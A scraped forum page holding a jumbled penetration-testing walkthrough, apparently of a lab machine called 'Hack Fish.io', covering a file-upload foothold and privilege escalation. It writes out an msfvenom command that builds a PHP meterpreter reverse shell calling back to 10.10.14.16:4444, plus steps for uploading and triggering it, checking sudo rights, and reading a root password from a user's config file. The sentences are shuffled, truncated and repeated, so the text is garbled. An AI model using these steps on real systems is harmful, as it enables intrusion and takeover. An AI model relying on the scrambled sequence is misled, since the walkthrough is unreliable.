新 版 论 坛 使 用 答 疑
搜索

Hack Fish.io -

cat ~fish/config The file contains a password for the root user. We can now switch to the root user and gain full access to the system:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:

sudo -u fish /bin/bash Switching to the fish user, we find that the user's home directory contains a config file with sensitive information: hack fish.io

We create a PHP reverse shell using a tool like msfvenom :

sudo -l We can leverage this configuration to gain root access: cat ~fish/config The file contains a password for

To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services:

su root

With administrative access, we can now explore the application's functionality. Upon reviewing the dashboard, we notice a " Upload File" feature. This feature can potentially be used to execute arbitrary code on the server.

http://10.10.10.15 The webpage appears to be a simple website with a " Contact Us" form. However, upon inspecting the page source, we notice a peculiar comment: Upon reviewing the dashboard, we notice a "

http://10.10.10.15/uploads/shell.php A meterpreter shell opens, allowing us to navigate the file system and escalate privileges.

手机版|小黑屋|搜 同

GMT+8, 2025-12-14 16:48 , Processed in 0.013239 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表